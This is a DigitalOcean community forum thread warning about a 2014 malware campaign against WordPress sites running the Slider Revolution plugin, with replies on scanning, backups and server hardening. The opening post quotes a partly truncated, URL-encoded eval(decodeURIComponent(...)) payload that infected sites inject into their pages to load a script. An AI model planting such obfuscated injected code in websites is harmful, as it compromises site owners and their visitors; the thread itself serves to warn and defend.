DigitalOcean

Report this

What is the reason for this report?
Question

WordPress Malware...check your sites!

Posted on December 16, 2014
Adam Robertson

By Adam Robertson

Looks like another WordPress exploit.: Some 100,000 or more WordPress sites infected by mysterious malware

Just checked all my sites and they look good. I did not bother using the suggested site scanner, but rather looked at the source code of all pages, since this:

“The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that includes the following:”

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

From what I have read, this was specific to sites using Slider Revolution, a premium WordPress plugin/



This textbox defaults to using Markdown to format your answer.

You can type !ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!

Sign In or Sign Up to Answer
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.
0
hunky
hunky
December 17, 2014

TO check, use websites like https://www.virustotal.com/ for URL scanner !!

0
nicklas473292
nicklas473292
December 16, 2014

Thank you so much for posting this, my entire site got it’s poo pushed in.

Thank god I used a backup plugin.

The attack blocked me out of my admin panel, corrupted the entire website - I’m still learning on Wordpress stuff, so I would’ve lost 5 months without a backup plugin.

Thanks for posting this, I’ve disabled the slide plugin right away.

0
alexdo
alexdo
April 3, 2022

Hello there,

The revolution slider is known for having security vulnerabilities and I’ll recommend using another gallery plugin for your WordPress site.

It is essential to secure your droplet, however running malware software is not definitely a must, but it is still a good thing to do.

I’ll highly recommend checking our tutorial An Introduction to Securing your Linux VPS

https://www.digitalocean.com/community/tutorials/an-introduction-to-securing-your-linux-vps

I can recommend using software like Linux Malware Detect which is a malware scanner for Linux.

Hope that this helps!

Become a contributor for community

Get paid to write technical tutorials and select a tech-focused charity to receive a matching donation.

Sign Up

DigitalOcean Documentation

Full documentation for every DigitalOcean product.

Learn more

Resources for startups and SMBs

The Wave has everything you need to know about building a business, from raising funding to marketing your product.

Learn more

Get our newsletter

Stay up to date by signing up for DigitalOcean’s Infrastructure as a Newsletter.

New accounts only. By submitting your email you agree to our Privacy Policy

The developer cloud

Scale up as you grow — whether you're running one virtual machine or ten thousand.

Get started for free

Sign up and get $200 in credit for your first 60 days with DigitalOcean.*

*This promotional offer applies to new accounts only.

© 2025 DigitalOcean, LLC.Sitemap.